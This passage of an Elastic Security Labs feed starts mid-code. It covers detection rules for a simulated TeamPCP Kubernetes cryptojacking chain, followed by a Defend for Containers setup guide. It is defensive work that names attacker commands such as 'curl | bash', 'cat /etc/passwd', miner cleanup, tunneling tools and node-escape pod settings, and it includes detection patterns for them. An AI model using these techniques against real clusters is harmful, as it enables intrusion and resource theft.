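    Handles symbolic '+x' forms and numeric octal modes; simplified."""
    if "+" in mode_arg and "x" in mode_arg:
        return True  # symbolic form, e.g. +x, a+x, u+x
    if mode_arg.isdigit():
        mode = int(mode_arg[-3:], 8)  # last three octal digits: u/g/o
        return bool(mode & 0o111)     # any execute bit set
    return False

for arg in ("755", "4755", "444", "a+x", "u+rw"):
    print(arg, grants_execute(arg))
```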
<p>The final piece of this chain relates to the execution of binaries in world-writable locations. Legitimate container workloads rarely execute payloads from these directories.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  process.executable like (
    &quot;/tmp/*&quot;, &quot;/dev/shm/*&quot;, &quot;/var/tmp/*&quot;, &quot;/run/*&quot;, &quot;/var/run/*&quot;,
    &quot;/mnt/*&quot;, &quot;/media/*&quot;, &quot;/boot/*&quot;
  ) or
  // Hidden process execution
  process.name like &quot;.*&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>Note that the rule also captures hidden process executions. Threat actors commonly use this technique as well, attempting to evade detection by giving executables hidden (dot-prefixed) file names.</p>
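Both conditions of that rule reduce to a simple path check. The sketch below mirrors the logic for illustration (the directory list is copied from the rule above; the function and event shape are hypothetical):

```python
# Directories from the rule above; legitimate workloads rarely run
# binaries from these locations inside a container.
WORLD_WRITABLE_PREFIXES = (
    "/tmp/", "/dev/shm/", "/var/tmp/", "/run/", "/var/run/",
    "/mnt/", "/media/", "/boot/",
)

def suspicious_exec_location(executable: str) -> bool:
    """Flag executables launched from world-writable or mount-style
    directories, or hidden binaries (dot-prefixed file names)."""
    name = executable.rsplit("/", 1)[-1]
    return executable.startswith(WORLD_WRITABLE_PREFIXES) or name.startswith(".")

print(suspicious_exec_location("/tmp/miner"))        # True
print(suspicious_exec_location("/usr/bin/.hidden"))  # True
print(suspicious_exec_location("/usr/bin/python3"))  # False
```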
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml">File Execution Permission Modification Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml">Suspicious Echo or Printf Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml">Suspicious Process Execution Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon miner deployment and execution:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image11.png" alt="Figure 8: Detection rules triggering for stage 8: Miner Deployment and Execution" title="Figure 8: Detection rules triggering for stage 8: Miner Deployment and Execution" /></p>
<h3>Stage 9 – Escalation to Node Control</h3>
<p>Once the attacker has a foothold inside a container and access to an overprivileged service account, the next step is to abuse the Kubernetes control plane itself. This stage moves the attack beyond a single container and into cluster-wide impact. This activity is detected via Kubernetes audit logs. The Kubernetes audit log rules surfaced by this intrusion fall into three distinct patterns.</p>
<h4>Stage 9.1 – Reconnaissance &amp; API Abuse</h4>
<p>The attacker's <code>kube.py</code> script uses the stolen service account token to enumerate pods, secrets, and nodes across all namespaces. From Kubernetes' perspective, this looks like a single identity making a burst of API calls across multiple resource types, a pattern that maps directly to permission enumeration detection logic. The use of Python's <code>urllib</code> as an API client, rather than <code>kubectl</code>, is also unusual.</p>
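Conceptually, the enumeration pattern can be reduced to grouping audit records by identity and counting distinct resource types touched within a window. The sketch below uses a hypothetical threshold and record shape purely to illustrate the idea, not the rule's actual aggregation logic:

```python
from collections import defaultdict

# Illustrative threshold: distinct resource types touched per identity
# within one window. The real rule's values and windowing differ.
ENUMERATION_THRESHOLD = 3

def enumeration_suspects(records: list) -> set:
    """Given (user, resource) pairs from one time window, return the
    identities touching an unusually broad set of resource types."""
    seen = defaultdict(set)
    for user, resource in records:
        seen[user].add(resource)
    return {u for u, res in seen.items() if len(res) >= ENUMERATION_THRESHOLD}

records = [
    ("system:serviceaccount:default:app", "pods"),
    ("system:serviceaccount:default:app", "secrets"),
    ("system:serviceaccount:default:app", "nodes"),
    ("system:serviceaccount:kube-system:coredns", "endpoints"),
]
print(enumeration_suspects(records))  # {'system:serviceaccount:default:app'}
```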
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_user_and_srcip.toml">Kubernetes Potential Endpoint Permission Enumeration Attempt Detected</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml">Direct Interactive Kubernetes API Request by Unusual Utilities</a></li>
</ul>
<p>Resulting in the following detection alerts upon reconnaissance and API abuse:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image7.png" alt="Figure 9: Detection rules triggering for stage 9.1: Reconnaissance &amp; API Abuse" title="Figure 9: Detection rules triggering for stage 9.1: Reconnaissance &amp; API Abuse" /></p>
<h4>Stage 9.2 – Privilege Escalation &amp; Workload Manipulation</h4>
<p>With enumeration complete, the attacker creates a privileged DaemonSet (<code>system-monitor</code>) and relies on the overprivileged ClusterRole that was bound to the compromised service account. Both the workload creation and the role that enabled it are flagged: the DaemonSet as a sensitive workload modification, and the ClusterRole binding as a sensitive role granting broad permissions, including <code>pods/exec</code>, secret access, and DaemonSet creation.</p>
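The RBAC side of this detection boils down to expanding a role's rules into (resource, verb) pairs and intersecting them with a sensitive-permission watchlist. The sketch below is a simplified illustration (resource and verb names follow the Kubernetes RBAC schema; the watchlist and structure are assumptions, not the rule's exact contents):

```python
# Illustrative watchlist of sensitive (resource, verb) grants.
SENSITIVE = {
    ("pods/exec", "create"), ("secrets", "get"),
    ("secrets", "list"), ("daemonsets", "create"),
}

def risky_permissions(rules: list) -> set:
    """Expand RBAC rules into (resource, verb) pairs and intersect with
    the sensitive-permission watchlist. Wildcards grant everything."""
    granted = set()
    for rule in rules:
        for resource in rule.get("resources", []):
            for verb in rule.get("verbs", []):
                if verb == "*" or resource == "*":
                    return SENSITIVE  # wildcard covers all sensitive grants
                granted.add((resource, verb))
    return granted & SENSITIVE

cluster_role_rules = [
    {"resources": ["pods/exec"], "verbs": ["create"]},
    {"resources": ["secrets"], "verbs": ["get", "list"]},
]
print(sorted(risky_permissions(cluster_role_rules)))
```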
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml">Unusual Kubernetes Sensitive Workload Modification</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml">Kubernetes Creation or Modification of Sensitive Role</a></li>
</ul>
<p>Resulting in the following detection alerts upon privilege escalation and workload manipulation:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image13.png" alt="Figure 10: Detection rules triggering for stage 9.2: Privilege Escalation &amp; Workload Manipulation" title="Figure 10: Detection rules triggering for stage 9.2: Privilege Escalation &amp; Workload Manipulation" /></p>
<h4>Stage 9.3 – Node-Level Escape</h4>
<p>The DaemonSet's pod spec is designed to break every isolation boundary a container normally provides. It requests privileged mode, attaches to the host network and PID namespace, and mounts the node's root filesystem. Each of these properties triggers a separate detection rule, and together they paint a clear picture of a container workload engineered for node escape.</p>
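The four properties those rules look for can be read directly off a pod spec. The sketch below walks a Kubernetes pod spec (field names follow the pod spec schema; the sensitive-path list and function are illustrative assumptions) and collects the isolation boundaries it breaks:

```python
def escape_indicators(pod_spec: dict) -> list:
    """Collect the isolation boundaries a pod spec breaks, mirroring the
    four audit-log rules: hostNetwork, hostPID, privileged mode, and
    sensitive hostPath mounts. Simplified illustration."""
    findings = []
    if pod_spec.get("hostNetwork"):
        findings.append("hostNetwork")
    if pod_spec.get("hostPID"):
        findings.append("hostPID")
    for c in pod_spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append("privileged")
    for v in pod_spec.get("volumes", []):
        path = v.get("hostPath", {}).get("path", "")
        # Hypothetical sensitive-path list; the rule's list is broader.
        if path in ("/", "/etc", "/root", "/var/run/docker.sock"):
            findings.append(f"hostPath:{path}")
    return findings

daemonset_pod = {
    "hostNetwork": True,
    "hostPID": True,
    "containers": [{"name": "system-monitor",
                    "securityContext": {"privileged": True}}],
    "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}],
}
print(escape_indicators(daemonset_pod))
```

A pod that trips all four indicators at once, as the <code>system-monitor</code> DaemonSet does, is effectively a node-escape vehicle rather than an ordinary workload.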
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml">Kubernetes Pod Created with a Sensitive hostPath Volume</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml">Kubernetes Privileged Pod Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml">Kubernetes Pod Created With HostNetwork</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml">Kubernetes Pod Created With HostPID</a></li>
</ul>
<p>Resulting in the following detection alerts upon node-level escape:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image3.png" alt="Figure 11: Detection rules triggering for stage 9.3: Node-Level Escape" title="Figure 11: Detection rules triggering for stage 9.3: Node-Level Escape" /></p>
<p>These three sub-stages also highlight a key boundary in container-focused detection. While D4C excels at observing what happens <em>inside</em> containers, identifying how and <em>why</em> those containers were created requires Kubernetes control-plane telemetry. In a follow-up “Kubernetes Detection Engineering” series, we will focus on correlating D4C runtime events with Kubernetes Audit logs to detect multi-stage attacks that span workload creation, privilege escalation, and node-level impact.</p>
<p>For anyone already familiar with Kubernetes audit logs or interested in learning more about them, we have several prebuilt detection rules available that leverage the Kubernetes audit log framework in our <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/kubernetes">GitHub detection-rules repository</a>.</p>
<h3>Stage 10 – Web Server Exploitation via React2Shell</h3>
<p>In addition to exploiting compromised containers and Kubernetes control paths, TeamPCP also leverages direct web server exploitation to gain shell access on exposed services. One of the techniques referenced in related campaigns is React2Shell, where vulnerable web applications are abused to achieve remote command execution and drop into an interactive shell.</p>
<p>The attacker’s objective here is straightforward: expand access beyond Kubernetes workloads and increase the number of entry points into the environment. Web-facing services are often less strictly isolated than containers and can provide a fast path to host-level compromise if left unpatched.</p>
<p>From a detection standpoint, this activity is already well covered. Elastic provides an umbrella web server exploitation detection that flags suspicious command execution patterns originating from web server processes. In addition, multiple host-based Linux detections identify post-exploitation behavior following successful web shell access, such as unexpected shell execution, command interpreters launched by web services, and follow-on tooling execution.</p>
<p>Detecting this stage is important because it represents an alternative ingress path that bypasses container-specific defenses entirely. When correlated with earlier D4C detections, React2Shell-style exploitation helps confirm that the attacker is actively pursuing multiple avenues of access, increasing both blast radius and persistence potential.</p>
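At its core, the web-shell signal described above is a parent/child relationship: a command interpreter spawned directly by a web server process. The sketch below illustrates that check with hypothetical process-name lists (the actual rule's watchlists differ):

```python
# Illustrative process-name lists, not the rule's exact watchlists.
WEB_SERVERS = {"nginx", "apache2", "httpd", "php-fpm", "tomcat",
               "node", "python3.11", "gunicorn"}
SHELLS = {"sh", "bash", "dash", "busybox", "zsh"}

def webserver_spawned_shell(parent: str, child: str) -> bool:
    """Flag a shell spawned directly by a web server process, the core
    signal behind web-shell post-exploitation detections."""
    return parent in WEB_SERVERS and child in SHELLS

print(webserver_spawned_shell("python3.11", "busybox"))  # True
print(webserver_spawned_shell("sshd", "bash"))           # False
```

This matches the behavior observed in the simulation, where <code>busybox</code> spawned from the <code>python3.11</code> web application process.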
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml">Web Server Exploitation Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon web server exploitation:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image1.png" alt="Figure 12: Detection rules triggering for stage 10: Web Server Exploitation via React2Shell" title="Figure 12: Detection rules triggering for stage 10: Web Server Exploitation via React2Shell" /></p>
<p>What makes this scenario effective as a detection exercise is that every major objective of the attacker (execution, persistence, propagation, and monetization) manifests as runtime behavior inside containers. D4C's ability to observe that behavior in context allows detection engineers to follow the attack as it unfolds, rather than discovering it only after the damage is done.</p>
<h2>Tying It All Together with Attack Discovery</h2>
<p>Running individual detection rules across container runtime and Kubernetes audit telemetry produces dozens of alerts, each highlighting a single suspicious action in isolation. A defender reviewing these one by one would see a privileged pod here, a <code>curl | bash</code> there, and a burst of API enumeration somewhere else. The challenge is not generating alerts; it is recognizing that these 130+ signals are all part of the same operation.</p>
<p>This is where <a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> comes in. Attack Discovery is Elastic's generative AI capability that ingests a set of alerts and automatically correlates them into coherent attack narratives. Rather than forcing an analyst to manually pivot between individual alerts, it identifies which signals belong together and maps them to the MITRE ATT&amp;CK framework, producing a single, readable summary of what happened.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/image6.png" alt="Figure 13: Attack Discovery analysis of the whole TeamPCP attack chain" title="Figure 13: Attack Discovery analysis of the whole TeamPCP attack chain" /></p>
<p>When pointed at the alerts generated by this simulation, Attack Discovery correctly reconstructed the full TeamPCP kill chain as a “Container Cryptojacking Attack Chain”. The summary identified:</p>
<ul>
<li><strong>Initial Access:</strong> Web server exploitation on the victim node, where <code>busybox</code> spawned from <code>python3.11</code> and executed reconnaissance commands (<code>id</code>, <code>whoami</code>, <code>uname -a</code>, <code>cat /etc/passwd</code>)</li>
<li><strong>Privilege Escalation:</strong> The <code>system:serviceaccount:kube-system:daemon-set-controller</code> service account creating highly privileged pods with <code>HostPID</code>, <code>HostNetwork</code>, privileged mode, and sensitive <code>hostPath</code> volume mounts</li>
<li><strong>Defense Evasion:</strong> Competitor cryptominer cleanup via <code>pkill -9 xmrig</code> and <code>pkill -9 XMRig</code>, alongside base64-encoded Python payloads</li>
<li><strong>Tool Staging:</strong> Runtime package installation (<code>apk</code>, <code>curl</code>, <code>bash</code>, <code>python3</code>) and malicious script download via <code>curl</code> from the simulated C2 server</li>
<li><strong>C2 Infrastructure:</strong> Deployment of tunneling tools <code>gost</code> and <code>frpc</code> under <code>/opt/teampcp</code>, with a SOCKS5 proxy listening on port 1081</li>
<li><strong>Impact:</strong> A decoded and staged <code>/tmp/miner</code> binary: the cryptojacking objective</li>
</ul>
<p>The attack chain visualization maps the correlated alerts across the full MITRE ATT&amp;CK kill chain, from Initial Access through to Impact, with confirmed activity in Execution, Privilege Escalation, Defense Evasion, Discovery, and Command &amp; Control.</p>
<p>This is the payoff of combining D4C runtime telemetry with Kubernetes audit logs. Neither data source alone would produce this picture: container runtime sees the <code>curl | bash</code>, the <code>gost</code> process, and the miner binary, while the audit logs capture the DaemonSet creation, the RBAC abuse, and the API enumeration. Attack Discovery fuses both into a single narrative that a SOC analyst can act on immediately, without manually stitching together alerts across different indices and timeframes.</p>
<h2>Conclusion</h2>
<p>Across this attack chain, we observed a consistent pattern. Interactive execution within containers led to environment discovery, lateral movement via Kubernetes APIs, attempts at persistence in locations inconsistent with container design, installation of runtime tooling, tunneling activity, reconstruction of encoded payloads, and, finally, resource monetization. Each objective produced distinct runtime signals.</p>
<p>Defend for Containers’ value lies in surfacing these signals with the container and orchestration context attached. Process lineage, capability metadata, interactive execution flags, file modification telemetry, and container identity together allow detections to move beyond simple command matching and instead reason about intent and impact.</p>
<p>This scenario also highlights an important architectural boundary. While D4C provides deep runtime visibility inside containers, certain escalation steps, such as privileged workload creation or control-plane manipulation, require Kubernetes audit log telemetry for full visibility. Effective cloud-native detection, therefore, depends on combining runtime and control-plane data sources.</p>
<p>In the next phase of this series, we will extend this model beyond the container boundary and explore Kubernetes control-plane detection engineering, correlating audit logs with D4C runtime events to detect multi-stage attacks that span workloads, nodes, and the cluster itself.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/teampcp-container-attack-scenario/teampcp-container-attack-scenario.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - Getting Started with Defend for Containers (D4C)]]></title>
            <link>https://www.elastic.co/security-labs/getting-started-with-defend-for-containers</link>
            <guid>getting-started-with-defend-for-containers</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This technical resource provides a comprehensive walkthrough of Elastic’s Defend for Containers (D4C) integration, covering Kubernetes-based deployment, the analysis of BPF-enriched runtime telemetry, and the practical application of policy-driven security controls to monitor and alert on activities within containerized Linux environments.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Linux systems remain a critical foundation for modern infrastructure, particularly in cloud-native environments where containers and orchestration platforms are the norm. As workloads move from long-lived hosts to ephemeral containers, attacker tradecraft shifts as well. Activity that once left persistent artifacts on disk is increasingly confined to short-lived, runtime behavior that can be difficult to capture using traditional log sources.</p>
<p>Detection engineering in these environments, therefore, depends heavily on runtime visibility. Understanding how processes execute inside containers, how files are accessed, and how workloads interact with the host becomes more important than relying on static indicators or post-incident artifacts.</p>
<p>Elastic provides several Linux-focused telemetry sources to support this type of detection work. In <a href="https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd">earlier posts in this series</a>, we focused on host-level visibility using Auditd and Auditd Manager, showing how low-level system events can be translated into high-fidelity detections. In this post, the focus shifts to Elastic’s Defend for Containers: a runtime security integration built specifically for containerized Linux workloads.</p>
<p>The goal of this article is not to document every Defend for Containers feature, but to provide a practical starting point for detection engineers: what data the integration produces and how to reason about that data. In the next part, we will look into how it can be applied to realistic container attack scenarios.</p>
<h2>Streamlined visibility with Defend for Containers</h2>
<p>We are excited to announce the arrival of Defend for Containers in the 9.3.0 release. This integration brings a streamlined approach to container security, offering a strong foundation for visibility in cloud-native infrastructures. Users can leverage a suite of detection rules tailored to defend against modern Kubernetes threats and container-specific vulnerabilities. The arrival of Defend for Containers is accompanied by <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/cloud_defend">a container-specific detection ruleset</a>, designed around realistic container and Kubernetes threat models.</p>
<p>At the time of writing, the Defend for Containers ruleset provides baseline coverage for common container attack techniques, including reconnaissance activity, credential access attempts, kubelet attacks, service account token abuse, interactive process execution, file creation and modification, interpreter abuse, encoded payload execution, tooling installation, tunneling behavior, and multiple privilege escalation vectors. Importantly, all existing container- and Kubernetes-specific detection rules <a href="https://github.com/elastic/detection-rules/pull/5685">have been made compatible with Defend for Containers</a>, allowing previously host-centric logic to operate directly on container runtime telemetry.</p>
<p>This makes Defend for Containers a practical and immediately usable data source for Linux detection engineers focused on behavior-driven runtime detection. The remainder of this post focuses on how that telemetry looks in practice and how it can be applied to real-world container attack scenarios.</p>
<h2>Introduction to Defend for Containers</h2>
<p><a href="https://www.elastic.co/docs/reference/integrations/cloud_defend">Defend for Containers</a> is a runtime security integration that provides visibility into Linux containers as they execute. Instead of relying on static image scanning or post-execution logs, it focuses on observing container behavior in real time.</p>
<p>At a high level, Defend for Containers captures security-relevant runtime events from running containers, such as process execution and file access. These events are enriched with container and orchestration context and shipped into Elasticsearch, where they can be analyzed and used as input for detection rules.</p>
<p>From a detection engineering perspective, Defend for Containers sits at the intersection of traditional Linux behavior and the container context. Processes, syscalls, and file activity remain core signals, but they are now scoped to containers, namespaces, and workloads that may only exist briefly.</p>
<p>Defend for Containers is deployed as part of the Elastic Agent and integrates directly with Elastic Security. Once enabled, it provides a dedicated stream of container runtime events that can be queried using KQL or ES|QL, or consumed directly by detection analytics. This allows detection engineers to apply familiar analysis techniques while accounting for the operational realities of cloud-native workloads.</p>
<p>In the sections that follow, we will examine Defend for Containers events in more detail and walk through several container attack scenarios to illustrate how this data can be used in practice.</p>
<h3>Defend for Containers setup</h3>
<p>Before you can take advantage of Defend for Containers' runtime visibility and analytics, you need to deploy the integration and configure a policy that defines which events to observe and what actions to take when matching activity is encountered. More information about the integration and its setup can be found <a href="https://www.elastic.co/docs/reference/integrations/cloud_defend">here</a>. At a high level, this setup consists of:</p>
<ol>
<li>Deploying the Defend for Containers integration via Elastic Agent in your Kubernetes environment.</li>
<li>Configuring or customizing the Defend for Containers policy, which consists of selectors that define which operations to match and responses that define what actions to take.</li>
<li>Validating and refining the policy based on observed workload behavior.</li>
</ol>
<h3>Deployment methods</h3>
<p>Defend for Containers is delivered as an Elastic Agent integration and relies on Elastic Agent to collect and forward container runtime telemetry into your Elastic Stack. For Kubernetes workloads, you install the integration via the Elastic Security UI and then enroll agents on your cluster nodes.</p>
<p>The basic deployment flow is:</p>
<p>In the Elastic Security UI, navigate to <a href="https://www.elastic.co/docs/reference/fleet">Fleet</a> and create a new Agent Policy (or add the integration to an existing one). Once the Agent Policy is created, we can add the “Defend for Containers” integration to the policy.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image1.png" alt="Figure 1: Add the integration to the agent policy view" title="Figure 1: Add the integration to the agent policy view" /></p>
<p>Give the integration a name and optionally adjust the default selectors and responses (we will look into the available options further down in this publication). Once “Add integration” is selected, a new Agent Policy with the correct integration should be available.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image5.png" alt="Figure 2: Agent policy integrations overview" title="Figure 2: Agent policy integrations overview" /></p>
<p>For this demonstration, we will leverage the Kubernetes deployment method. To deploy this policy to a workload, we can navigate to Actions → Add agent → Kubernetes. Here, we see instructions for copying or downloading the Kubernetes manifest.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image19.png" alt="Figure 3: Defend for Containers Kubernetes manifest overview" title="Figure 3: Defend for Containers Kubernetes manifest overview" /></p>
<p>An important note to be aware of is: “<em>Note that the following manifest contains resource limits that may not be appropriate for a production environment. Review our guide on <a href="https://www.elastic.co/docs/reference/fleet/scaling-on-kubernetes#_specifying_resources_and_limits_in_agent_manifests">Scaling Elastic Agent on Kubernetes</a> before deploying this manifest.</em>”</p>
<p>You will need to include the following <code>capabilities</code> under <code>securityContext</code> in your Kubernetes YAML for the service to work:</p>
<pre><code class="language-yaml">securityContext:
    runAsUser: 0
    capabilities:
      add:
        - BPF ## Enables both BPF &amp; eBPF
        - PERFMON
        - SYS_RESOURCE
</code></pre>
<p>After copying or downloading the provided <code>elastic-agent-managed-kubernetes.yml</code> manifest, you can edit the manifest as needed, and apply the manifest with:</p>
<pre><code class="language-bash">kubectl apply -f elastic-agent-managed-kubernetes.yml
</code></pre>
<p>As also mentioned in the manifest, review the guide “<a href="https://www.elastic.co/docs/reference/fleet/running-on-kubernetes-managed-by-fleet">Run Elastic Agent on Kubernetes managed by Fleet</a>” for more deployment information.</p>
<p>Wait for the Elastic Agent pods to schedule and for data to begin flowing into Elasticsearch.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image16.png" alt="Figure 4: Defend for Containers integration input overview" title="Figure 4: Defend for Containers integration input overview" /></p>
<p>Once deployed, Elastic Agent will establish a connection to Fleet, enroll under the selected policy, and begin emitting Defend for Containers telemetry that Elastic Security can consume.</p>
<p>In the next section, we will take a look at the integration configuration options and explore which features are available to use.</p>
<h3>Defend for Containers policies</h3>
<p>At the heart of Defend for Containers' configuration is the policy. Policies determine what activity to observe and how to respond when matching events occur. Policies are composed of two fundamental building blocks:</p>
<ul>
<li><strong>Selectors:</strong> define which events are of interest by specifying operations and conditions;</li>
<li><strong>Responses:</strong> define what actions to take when a selector’s conditions are met.</li>
</ul>
<p>Defend for Containers policies can be edited before deployment or modified post-deployment via the Elastic Security UI’s policy editor.</p>
<h4>Policy structure</h4>
<p>Each policy must contain at least one selector and at least one response. A typical selector specifies one or more operations (such as process events or file activities) and uses conditions (like container image name, namespace, or pod label) to narrow the scope. Responses reference selectors and indicate what action to take when events match.</p>
<p>The default Defend for Containers policy includes two selector-response pairs: “Threat Detection” and “Drift Detection &amp; Prevention”.</p>
<p><strong>Threat detection:</strong> A <code>selector</code> named <code>allProcesses</code> matches all <code>fork</code> and <code>exec</code> events from containers.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image13.png" alt="Figure 5: Defend for Containers allProcesses selector" title="Figure 5: Defend for Containers allProcesses selector" /></p>
<p>And the associated <code>response</code> has the action set to <code>Log</code>, ensuring that events are ingested and can be analyzed.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image11.png" alt="Figure 6: Defend for Containers allProcesses log response" title="Figure 6: Defend for Containers allProcesses `log` response" /></p>
<p><strong>Drift detection &amp; prevention:</strong> A selector named <code>executableChanges</code> matches <code>createExecutable</code> and <code>modifyExecutable</code> operations.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image7.png" alt="Figure 7: Defend for Containers executableChanges selector" title="Figure 7: Defend for Containers executableChanges selector" /></p>
<p>And the response is configured to create alerts (and can be modified to block those operations).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image18.png" alt="Figure 8: Defend for Containers executableChanges alert response" title="Figure 8: Defend for Containers executableChanges `alert` response" /></p>
<p>These can be modified via the UI, but under the hood, these policies are simple YAML configuration files that can easily be modified and used in any CI/CD flow:</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: allProcesses
      operation:
        - fork
        - exec
  responses:
    - match:
        - allProcesses
      actions:
        - log
file:
  selectors:
    - name: executableChanges
      operation:
        - createExecutable
        - modifyExecutable
  responses:
    - match:
        - executableChanges
      actions:
        - alert
</code></pre>
<p>Next, we will take a look at some example selectors and responses and discuss the options you have for setting up the integration to your liking.</p>
<p><strong>Example selector snippet</strong></p>
<p>Selectors allow fine-grained matching using conditions on fields such as:</p>
<ul>
<li><code>containerImageFullName</code>: full image names like <code>docker.io/nginx</code>;</li>
<li><code>containerImageName</code>: partial image names;</li>
<li><code>containerImageTag</code>: specific tags like <code>latest</code>;</li>
<li><code>kubernetesClusterId</code>: Kubernetes cluster IDs;</li>
<li><code>kubernetesClusterName</code>: Kubernetes cluster names;</li>
<li><code>kubernetesNamespace</code>: namespaces where the workload runs;</li>
<li><code>kubernetesPodName</code>: pod names, with support for trailing wildcards;</li>
<li><code>kubernetesPodLabel</code>: label key/value pairs, with wildcard support.</li>
</ul>
<pre><code class="language-yaml">file:
  selectors:
    - name: nodeExports
      operation:
        - createExecutable
        - modifyExecutable
      containerImageName:
        - &quot;nginx&quot;
      kubernetesNamespace:
        - &quot;prod-*&quot;
</code></pre>
<p>In this example, the selector named <code>nodeExports</code> matches file events that create or modify executables within containers whose image names contain <code>nginx</code> and whose Kubernetes namespace begins with <code>prod-</code>.</p>
<p><strong>Example response snippet</strong></p>
<p>Responses determine what happens when selector conditions are met. Common actions include:</p>
<ul>
<li><code>log</code>: send the event as telemetry for analysis;</li>
<li><code>alert</code>: create an alert in Elastic Security;</li>
<li><code>block</code>: prevent the operation (for supported types).</li>
</ul>
<pre><code class="language-yaml">file:
  responses:
    - match:
        - nodeExports
      actions:
        - alert
        - block
</code></pre>
<p>Here, the response references the previously defined <code>nodeExports</code> selector and will both generate an alert and block the operation.</p>
<h4>Wildcards and matching</h4>
<p>Selectors in Defend for Containers support trailing wildcards in string-based conditions (such as pod names or image tags). This allows broad matching without enumerating every possible value. For example, a pod selector of <code>backend-*</code> will match all pods whose names begin with <code>backend-</code>, while a label condition such as <code>role:api*</code> matches label values that start with <code>api</code>.</p>
<p>This wildcarding is essential in dynamic environments where workloads scale and shift rapidly.</p>
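<p>To make this concrete, here is a hypothetical selector combining both wildcard forms described above (the selector name and values are illustrative):</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: backendApiPods          # illustrative name
      operation:
        - exec
      kubernetesPodName:
        - &quot;backend-*&quot;              # trailing wildcard on pod names
      kubernetesPodLabel:
        - &quot;role:api*&quot;              # wildcard on label values
</code></pre>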
<p>In addition to simple string matching, Defend for Containers selectors also support <strong>path-based wildcard semantics</strong> when matching file paths. Consider the following selector example:</p>
<pre><code class="language-yaml">- name: pathMatching
  targetFilePath:
    - /usr/bin/echo
    - /usr/sbin/*
    - /usr/local/**
</code></pre>
<p>In this example:</p>
<ul>
<li><code>/usr/bin/echo</code> matches only the <code>echo</code> binary at that exact path.</li>
<li><code>/usr/sbin/*</code> matches everything that is a direct child of <code>/usr/sbin</code>.</li>
